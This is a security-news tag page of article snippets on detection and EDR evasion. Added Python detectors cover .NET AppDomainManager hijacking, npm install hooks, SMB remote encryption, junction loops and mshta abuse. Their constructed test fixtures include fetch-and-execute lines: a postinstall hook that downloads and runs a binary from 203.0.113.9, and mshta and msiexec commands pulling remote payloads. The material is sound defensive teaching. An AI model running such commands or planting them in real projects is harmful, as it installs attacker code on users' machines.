Tag: detection
-
Fingerprint launches AI assistant detection tools
First seen on scworld.com Jump to article: www.scworld.com/brief/fingerprint-launches-ai-assistant-detection-tools
-
AI-built ransomware toolkit automates EDR evasion, AD discovery
A threat actor is using an AI-built ransomware attack toolkit that automates Active Directory discovery and helps evade endpoint detection and response (EDR) solutions. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-built-ransomware-toolkit-automates-edr-evasion-ad-discovery/
-
Why the browser is now the front line for AI security
AI-powered attacks and shadow AI adoption are creating new security risks inside the browser. Push Security explains why browser visibility is becoming critical for both threat detection and AI governance. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/why-the-browser-is-now-the-front-line-for-ai-security/
-
(g+) Real-time monitoring: endpoint security rethought
Endpoint detection and response systems are becoming the core of modern security operations. They monitor processes, identities and behaviour in real time. First seen on golem.de Jump to article: www.golem.de/news/echtzeitueberwachung-endpoint-security-neu-gedacht-2606-209271.html
-
How Leading Organizations Are Turning EDR Into Operational Resilience
Most organizations now recognize that endpoint protection alone is no longer sufficient. That’s why adoption of endpoint detection and response (EDR) has accelerated rapidly in recent years. Organizations understand that modern attacks move faster, evade traditional prevention controls, and require continuous visibility into suspicious activity across the environment. But owning EDR First seen on thehackernews.com Jump to…
-
Sophos uncovers AI-powered malware lab built for EDR evasion
A threat actor used AI technologies to build a malware-testing framework for developing and refining endpoint detection and response (EDR) evasion techniques, according to … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/06/02/ai-agents-edr-evasion-techniques/
-
Iranian Hackers Hijack AppDomainManager to Bypass EDR
Iran-linked hackers have upgraded their tradecraft by using AppDomainManager hijacking in .NET applications to turn off security telemetry before malicious code fully starts, making the attack much harder for endpoint detection and response tools to spot. The campaign, attributed to the Iran-nexus group Screening Serpens, pairs this technique with DLL sideloading, fake job lures, and staged…
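The hijack works because the .NET runtime loads whichever AppDomainManager an executable's configuration names before the application's own entry point runs. The two places that name it are the `<runtime>` section of the `<app>.exe.config` file (`appDomainManagerAssembly` / `appDomainManagerType`) and the `APPDOMAIN_MANAGER_ASM` / `APPDOMAIN_MANAGER_TYPE` environment variables. Legitimate software almost never sets either, so checking for them is a cheap, high-signal hunt. The following is an added example written for this page, not code from the article or from the campaign it describes; the config documents and the environment dictionary are constructed, and an unsigned (`PublicKeyToken=null`) assembly is treated as the riskier case because the loader will probe for it next to the executable rather than in the GAC.

```python
"""Spot AppDomainManager hijacking artifacts in .NET configs and environments.

Added example, not code from the article or from the Screening Serpens campaign.
The config text and environment below are constructed.
"""
import xml.etree.ElementTree as ET

ENV_KEYS = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE")


def parse_assembly_name(display_name: str) -> dict:
    """Split 'Name, Version=..., Culture=..., PublicKeyToken=...' into parts."""
    parts = [p.strip() for p in display_name.split(",")]
    info = {"name": parts[0]}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            info[key.strip().lower()] = value.strip()
    return info


def inspect_config(xml_text: str) -> dict:
    """Return a finding for one <app>.exe.config document."""
    root = ET.fromstring(xml_text)
    runtime = root.find("runtime")
    asm = runtime.find("appDomainManagerAssembly") if runtime is not None else None
    typ = runtime.find("appDomainManagerType") if runtime is not None else None
    if asm is None and typ is None:
        return {"hijack_candidate": False}
    asm_info = parse_assembly_name(asm.get("value", "")) if asm is not None else {}
    # A strong-named assembly carries a real PublicKeyToken; 'null' means an
    # unsigned DLL that the runtime will look for beside the EXE.
    token = asm_info.get("publickeytoken", "null").lower()
    return {
        "hijack_candidate": True,
        "assembly": asm_info.get("name"),
        "type": typ.get("value") if typ is not None else None,
        "strong_named": token != "null",
    }


def inspect_env(env: dict) -> dict:
    """Flag the environment-variable variant of the same technique."""
    hits = {k: env[k] for k in ENV_KEYS if k in env}
    return {"hijack_candidate": bool(hits), "variables": hits}


# Constructed samples: one config that names a custom manager, one that does not.
SUSPICIOUS_CONFIG = """<?xml version="1.0"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="UpdateHelper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="UpdateHelper.Bootstrap" />
  </runtime>
</configuration>"""

BENIGN_CONFIG = """<?xml version="1.0"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
</configuration>"""

CONSTRUCTED_ENV = {
    "PATH": "C:\\Windows\\system32",
    "APPDOMAIN_MANAGER_ASM": "UpdateHelper",
    "APPDOMAIN_MANAGER_TYPE": "UpdateHelper.Bootstrap",
}

if __name__ == "__main__":
    print(inspect_config(SUSPICIOUS_CONFIG))
    print(inspect_config(BENIGN_CONFIG))
    print(inspect_env(CONSTRUCTED_ENV))
```

In a hunt, run `inspect_config` over every `*.exe.config` in program and user-writable directories and `inspect_env` over process environments from your EDR; any hit is worth a look, and an unsigned manager assembly sitting next to a signed host executable is the sideloading pairing the article describes.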
-
No regulatory text mandates a SOC: compliance requires detection and response, not a SOC
First seen on security-insider.de Jump to article: www.security-insider.de/soc-mythos-nis2-dora-cra-detection-response-betriebsmodell-a-08d0a949ea491c1348d52aef22c9639e/
-
Sophos' agentic security operations center cuts threat response time to 89 seconds
Sophos announced production results from a full year of agentic operation of Sophos Managed Detection and Response (MDR). The service now protects 40,000 customers worldwide and recorded 39 percent year-over-year growth. The results show how an agentic security operations center (SOC) works at scale. Telemetry volumes are exploding, IT stacks are becoming more complex, and at the same time there is a global shortage of cybersecurity professionals. Traditional…
-
Lazarus APT unveils fileless remote access Trojan designed to evade detection
North Korea-linked Lazarus APT Group is using a stealthy memory-only RAT that leaves almost no forensic traces behind. North Korea-linked APT group Lazarus has never been shy about its ambitions, the threat actor has been tied to some of the most audacious financial heists in recent memory, draining hundreds of millions from cryptocurrency exchanges and…
-
Ransomware Uses ChaCha20 and Curve25519 to Encrypt Windows Files
Payload ransomware is a new Windows ransomware family that combines ChaCha20 stream encryption with per-file Curve25519 ECDH key exchange, making victim data effectively unrecoverable without the attackers’ private key. It also implements strong anti-forensics, including ETW patching, VSS deletion, event log wiping, and aggressive process/service termination to hinder detection and recovery. Payload first appeared publicly…
-
InvisibleFerret Malware Uses .pyd and .so Files to Evade Script Detection
A North Korea-linked threat group, Void Dokkaebi, also known as Famous Chollima, has significantly upgraded its malware delivery techniques by converting its Python-based InvisibleFerret malware into compiled binary modules. InvisibleFerret was previously deployed as readable Python scripts, making it easier for defenders to detect through static analysis and signature-based tools. The latest campaign leverages Cython,…
-
The Alert Firehose Finally Meets Its Match
Ask a cybersecurity pro about Network Detection and Response (NDR) and you might still hear “Noisy,” “Too much data.” But ask the teams running NDR that includes agentic AI capabilities and you’ll hear they’re actually using it to catch threats earlier, triage faster, and chase fewer false positives. The old complaint lingers in part because…
-
Hackers Hide Linux Malware in SSH-Like Package Filename
Hackers have been observed disguising a malicious Linux payload under an SSH-like filename during software installation, as part of a coordinated supply chain attack targeting developer ecosystems. The attack hinges on a hidden post-install script embedded inside package.json, rather than the expected composer.json used in PHP environments. This subtle placement allows the malicious code to evade detection during routine dependency…
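npm runs a dependency's `preinstall`, `install`, `postinstall` and `prepare` scripts automatically during `npm install`, so a manifest that uses one of those hooks to fetch, chmod and launch a binary with an SSH-like name is the shape to look for, and a `package.json` shipped alongside the `composer.json` that PHP-oriented review actually reads is itself worth flagging. The checker below is an added example for this page, not code from the article or from the malicious package; the two manifests, the `203.0.113.9` address and the indicator patterns are constructed and should be tuned to your own ecosystem.

```python
"""Flag npm install-time hooks that behave like a dropper.

Added example, not code from the article or from the package it describes.
Manifests and indicator patterns below are constructed for illustration.
"""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator patterns for the hook body (assumed; a benign hook usually just
# calls a known build tool such as tsc or node).
INDICATORS = {
    "downloads at install time": re.compile(r"\b(curl|wget)\b"),
    "marks a file executable": re.compile(r"\bchmod\s+\+x\b"),
    "runs an SSH-like binary name": re.compile(r"(^|[\s/;&|])\.?/?(ssh|sshd|ssh-agent)[\w.-]*\b"),
    "decode-and-execute": re.compile(r"\bbase64\b.*\s-d\b|\beval\b"),
}


def scan_manifest(text: str) -> list[dict]:
    """Return one finding per install-time hook present in a package.json."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [label for label, rx in INDICATORS.items() if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd,
                         "indicators": hits, "suspicious": bool(hits)})
    return findings


def unexpected_npm_manifest(files: set) -> bool:
    """A package.json next to composer.json in a PHP package is where the
    article's hook lived: reviewers read the Composer manifest, not this one."""
    return "composer.json" in files and "package.json" in files


# Constructed manifests: a dropper-style postinstall and a normal build step.
MALICIOUS_PACKAGE_JSON = """{
  "name": "example-php-bridge",
  "version": "2.1.0",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -s https://203.0.113.9/ssh-helper -o ./bin/ssh-helper && chmod +x ./bin/ssh-helper && ./bin/ssh-helper"
  }
}"""

BENIGN_PACKAGE_JSON = """{
  "name": "example-widget",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node scripts/build.js",
    "test": "jest"
  }
}"""

if __name__ == "__main__":
    for finding in scan_manifest(MALICIOUS_PACKAGE_JSON) + scan_manifest(BENIGN_PACKAGE_JSON):
        print(finding)
    print(unexpected_npm_manifest({"composer.json", "package.json", "src/"}))
```

Run `scan_manifest` over every `package.json` in `node_modules` after a lockfile-resolved install in CI, and treat any install hook at all as something to review; `npm install --ignore-scripts` stops the hooks from running while you look.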
-
WantToCry ransomware evades detection through SMB abuse, remote encryption
First seen on scworld.com Jump to article: www.scworld.com/news/wanttocry-ransomware-evades-detection-through-smb-abuse-remote-encryption
-
Fake Android Apps Commit Carrier Billing Fraud for Premium Services
The disguised apps use WebView automation, JavaScript injection, and OTP interception to avoid detection and complete fraudulent subscriptions. First seen on darkreading.com Jump to article: www.darkreading.com/mobile-security/fake-android-apps-carrier-billing-fraud
-
WantToCry Ransomware Exploits SMB to Encrypt Remote Files
A new ransomware campaign named “WantToCry” leverages exposed Server Message Block (SMB) services to gain access and encrypt victim data without deploying traditional malware on compromised systems. This approach significantly reduces the detection surface, making it harder for conventional security tools to identify the attack. The name “WantToCry” appears to reference the infamous WannaCry…
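Remote encryption over SMB leaves nothing for the victim's endpoint agent to see, because the process doing the encrypting runs on the attacker's machine; what it cannot hide is its footprint on the file server, where one remote client rewrites and renames many files across many folders to a single new extension in a short time. The detector below is an added example for this page, not code from the article or from the WantToCry campaign. The events, client addresses, share names and the `.locked` extension are constructed; on a Windows file server the equivalent raw data would come from object-access auditing (for instance Security events 5145 and 4663), which is an assumption about your telemetry pipeline.

```python
"""Flag remote-encryption bursts in file-server SMB audit events.

Added example, not code from the article or from WantToCry. All events are constructed.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass
class ShareEvent:
    ts: float            # seconds since epoch
    src_ip: str          # SMB client that issued the request
    account: str
    op: str              # "write", "rename" or "delete"
    path: str
    new_path: str = ""   # target of a rename


def _parent(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[0]


def _ext(path: str) -> str:
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_remote_encryption(events, window_s=60.0, rename_threshold=20,
                             dominance=0.9, min_dirs=2):
    """One alert per source IP whose renames in any window_s-second window
    reach rename_threshold, mostly share one new extension, and span at
    least min_dirs folders. Thresholds are assumptions to tune per share."""
    renames = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        if e.op == "rename":
            renames[e.src_ip].append(e)
    alerts = []
    for src, evs in renames.items():
        start = 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window_s:
                start += 1          # slide the window forward in time
            window = evs[start:end + 1]
            if len(window) < rename_threshold:
                continue
            ext, n = Counter(_ext(e.new_path) for e in window).most_common(1)[0]
            dirs = {_parent(e.path) for e in window}
            if n / len(window) >= dominance and len(dirs) >= min_dirs:
                alerts.append({"src_ip": src, "account": window[0].account,
                               "renames": len(window), "extension": ext,
                               "folders": len(dirs), "first_ts": window[0].ts})
                break               # one alert per source is enough for triage
    return alerts


def constructed_events():
    """A user renaming two files, then one client renaming 32 files in 4 folders."""
    t0 = 1_700_000_000.0
    evs = [
        ShareEvent(t0 + 1, "10.0.0.20", "CORP\\alice", "rename",
                   "\\\\FS01\\finance\\q1.xlsx", "\\\\FS01\\finance\\q1-final.xlsx"),
        ShareEvent(t0 + 9, "10.0.0.20", "CORP\\alice", "rename",
                   "\\\\FS01\\finance\\notes.txt", "\\\\FS01\\finance\\notes-old.txt"),
    ]
    folders = ["finance", "hr", "legal", "eng"]
    for i in range(32):
        p = "\\\\FS01\\%s\\file%d.docx" % (folders[i % 4], i)
        evs.append(ShareEvent(t0 + 20 + i * 0.8, "10.0.0.77", "CORP\\svc-backup", "write", p))
        evs.append(ShareEvent(t0 + 20.3 + i * 0.8, "10.0.0.77", "CORP\\svc-backup",
                              "rename", p, p + ".locked"))
    return evs


if __name__ == "__main__":
    for alert in detect_remote_encryption(constructed_events()):
        print(alert)
```

The source IP in the alert is the box to isolate; the account tells you which credential was used to mount the share, which is often the more useful lead when no malware was ever dropped on the victim.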
-
New GhostTree Attack Causes EDR Tools to Hang, Leaving Files Unscanned
A newly disclosed attack technique dubbed “GhostTree” is raising concerns among defenders after researchers demonstrated how it can disrupt endpoint detection and response (EDR) tools and bypass file scanning mechanisms on Windows systems. The technique, discovered by Varonis Threat Labs, abuses NTFS junctions to create recursive directory structures that can cause security tools to hang indefinitely. New…
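A scanner that descends into every directory link without remembering where it has been will re-enter the same directory forever once a junction points back at an ancestor, which is the failure mode GhostTree turns against EDR file scanning. The walker below is an added example for this page, not code from the article or from Varonis, and shows the two guards that remove the hang: tracking each directory's (device, inode) identity so a revisited directory is skipped, and capping recursion depth so a pathologically deep tree cannot run away either. The fixture builds the POSIX analog of an NTFS junction loop (a symlink from `docs/nested` back to the root) in a temporary directory; on Windows the same loop would be made with `mklink /J`, and Python's `os.stat` reports a comparable file identity there.

```python
"""A file walker that cannot be hung by junction or symlink loops.

Added example, not code from the article or from Varonis. The temp-directory
fixture is constructed; the symlink stands in for an NTFS junction.
"""
import os
import tempfile


def safe_walk(root: str, max_depth: int = 64):
    """Return (files, skipped): regular files under root, and the paths that
    were not descended into because they were already visited or too deep."""
    files, skipped, visited = [], [], set()

    def visit(path: str, depth: int) -> None:
        try:
            st = os.stat(path)            # follows links: identity of the target
        except OSError:
            return
        key = (st.st_dev, st.st_ino)
        if key in visited or depth > max_depth:
            skipped.append(path)          # loop, alias or runaway depth: do not re-enter
            return
        visited.add(key)
        try:
            with os.scandir(path) as it:
                for entry in it:
                    if entry.is_dir():    # True for links to directories as well
                        visit(entry.path, depth + 1)
                    elif entry.is_file():
                        files.append(entry.path)
        except OSError:
            pass                          # unreadable directory: skip it, never hang

    visit(root, 0)
    return files, skipped


def demo() -> dict:
    """Build root/docs/report.txt and root/docs/nested -> root, then scan."""
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "docs")
        os.makedirs(docs)
        with open(os.path.join(docs, "report.txt"), "w") as fh:
            fh.write("constructed sample file\n")
        os.symlink(root, os.path.join(docs, "nested"), target_is_directory=True)
        files, skipped = safe_walk(root)
        return {"files": sorted(os.path.relpath(p, root) for p in files),
                "skipped": [os.path.relpath(p, root) for p in skipped]}


if __name__ == "__main__":
    print(demo())
```

A naive `os.walk(root, followlinks=True)` on the same fixture keeps descending `docs/nested/docs/nested/...` until the path length limit stops it; a scanner written that way against a junction loop is what "hangs indefinitely" looks like in practice, and the only file worth scanning here is found once.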
-
Typosquatting Is No Longer a User Problem. It’s a Supply Chain Problem
AI-generated lookalike domains are now embedded inside the third-party scripts running on your web properties. Here’s why your current stack can’t see them, and what detection actually requires. TL;DR Typosquatting is no longer a user problem. Attackers now embed lookalike domains inside legitimate third-party scripts.…
-
Internet Explorer may be dead, but its ghost still runs malware
A legacy Windows tool that refuses to die: Bitdefender’s findings suggest MSHTA remains attractive because it checks several boxes attackers like. These include it being Microsoft-signed, preinstalled on Windows, capable of in-memory execution, and still implicitly trusted in many environments. Other sophisticated campaigns picked it up too. Bitdefender detailed PurpleFox using MSHTA to launch ‘msiexec’ commands…
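Because mshta.exe is signed and preinstalled, the image name alone is not an indicator; what stands out is how it is invoked (a `javascript:` or `vbscript:` protocol handler, or a remote URL in place of a local `.hta` file) and what it spawns, such as the `msiexec` launches the article attributes to PurpleFox. The triage routine below is an added example for this page, not code from the article or from Bitdefender. The process-creation events and the `203.0.113.5` address are constructed, and the field names follow a Sysmon Event ID 1 style as an assumption about your telemetry.

```python
"""Triage mshta.exe activity from process-creation telemetry.

Added example, not code from the article or from Bitdefender. Events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the created process
    command_line: str


MSHTA = "mshta.exe"
SUSPICIOUS_CHILDREN = {"msiexec.exe", "powershell.exe", "cmd.exe",
                       "rundll32.exe", "regsvr32.exe", "wscript.exe"}
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.I)
REMOTE_URL = re.compile(r"\bhttps?://", re.I)


def _name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage_mshta(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, reason) pairs; a pid may appear once per reason."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if _name(e.image) == MSHTA:
            if INLINE_SCRIPT.search(e.command_line):
                alerts.append((e.pid, "mshta invoked with a javascript:/vbscript: handler"))
            if REMOTE_URL.search(e.command_line):
                alerts.append((e.pid, "mshta given a remote URL rather than a local .hta"))
        parent = by_pid.get(e.ppid)
        if (parent is not None and _name(parent.image) == MSHTA
                and _name(e.image) in SUSPICIOUS_CHILDREN):
            alerts.append((e.pid, f"{_name(e.image)} spawned by mshta.exe (pid {parent.pid})"))
    return alerts


# Constructed events: an Office-spawned mshta running inline VBScript that
# pulls a remote scriptlet, the msiexec it launches, and two benign processes.
CONSTRUCTED_EVENTS = [
    ProcEvent(100, 10, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" C:\Users\alice\Downloads\invoice.docm'),
    ProcEvent(101, 100, r"C:\Windows\System32\mshta.exe",
              'mshta.exe vbscript:Execute("GetObject(""script:https://203.0.113.5/stage.sct"")")'),
    ProcEvent(102, 101, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /q /i https://203.0.113.5/p.msi"),
    ProcEvent(103, 20, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),   # local .hta: not flagged
    ProcEvent(104, 20, r"C:\Windows\explorer.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for pid, reason in triage_mshta(CONSTRUCTED_EVENTS):
        print(pid, reason)
```

Detection is the fallback here: in environments that do not need HTML Applications, blocking mshta.exe outright (application control or an attack surface reduction rule) removes the LOLBin rather than chasing its invocations.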
-
JavaScript Malware Campaign Drops Crypto Clipper via PowerShell
A large-scale CountLoader campaign uses layered obfuscation, multi-stage payload delivery, and covert command-and-control (C2) communication to deploy cryptocurrency clipper malware. The campaign stands out for its complex infection chain, combining JavaScript, PowerShell, and in-memory shellcode execution to evade detection and maintain persistence across infected systems. The attack begins with a malicious executable that launches…
-
How to Reduce Phishing Exposure Before It Turns into Business Disruption
What happens when a phishing email looks clean enough to pass through security, but dangerous enough to expose the business after one click? That is the gap many SOCs still struggle with: the attacks that leave teams unsure what was exposed, who else was targeted, and how far the risk has spread. Early phishing detection closes…
-
Continuous Detection, Continuous Response: Mate Security Redefines the Modern SOC
New York, USA, 18th May 2026, CyberNewswire First seen on hackread.com Jump to article: hackread.com/continuous-detection-continuous-response-mate-security-soc/
-
Gremlin Stealer Hides Payloads in .NET Resources to Evade Detection
A newly discovered variant of the Gremlin Stealer is raising concerns among security researchers by adopting stealth-focused techniques that significantly reduce its detection footprint. Gremlin Stealer is an information-stealing malware actively sold on Telegram. It targets a wide range of sensitive data from infected systems, including payment card details, browser cookies, session tokens, cryptocurrency wallets,…
-
Why the best security investment a board can make in 2026 isn’t another tool
Attackers don’t break through your defenses. They walk between them: The most effective attacks today don’t target any single tool’s coverage area. They move through the seams. An attacker who compromises a valid credential doesn’t trigger endpoint detection. An attacker who moves from one cloud service to another using legitimate trust relationships doesn’t trip network…

